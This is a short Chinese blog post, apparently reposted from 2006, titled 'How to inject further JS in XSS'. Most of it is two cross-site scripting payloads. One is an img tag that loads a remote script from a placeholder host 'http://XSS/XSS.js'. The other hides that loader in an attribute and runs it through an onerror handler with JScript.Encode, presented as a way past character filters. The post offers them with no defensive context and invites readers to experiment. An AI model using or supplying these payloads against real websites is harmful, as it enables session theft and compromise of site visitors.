在XSS中如何再插JS

首页 > 技术文章 > 在XSS中如何再插JS

2006年10月9日 Chinadu 发表评论 69 views 阅读评论

来自：s0n9'5 B1o9

在XSS中如何再插JS

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" "onerror"="window.execSript(decodeURI(this.XSS),'Jscript.Encode');" >

加密后

嘿嘿~刺激吧~再怎么用你自己实验吧.

2009年07月27日 -- xss简单渗透测试
2008年12月1日 -- Yahoo webmail xss&OWA xss
2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
2008年11月8日 -- SQL Injection/XSS Cheat Sheet
2008年11月5日 -- Discuz! member.php xss bug
2008年11月3日 -- Discuz! 数据库错误信息xss bug
2008年11月3日 -- Discuz! admincp.php xss bug
2008年10月16日 -- PHP SQL Injection 和 XSS 的偵測程式和程式撰寫注意事項 – 2008
2008年06月30日 -- 关于XSS漏洞另一个攻击趋势
2007年03月19日 -- 跨站Script攻击和防范

分类: 技术文章标签: XSS

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

奇炫的JavaScript代码 JIMMY中文站留言簿漏洞利用

一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29

Chinadu's Blog

在XSS中如何再插JS

相关文章

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives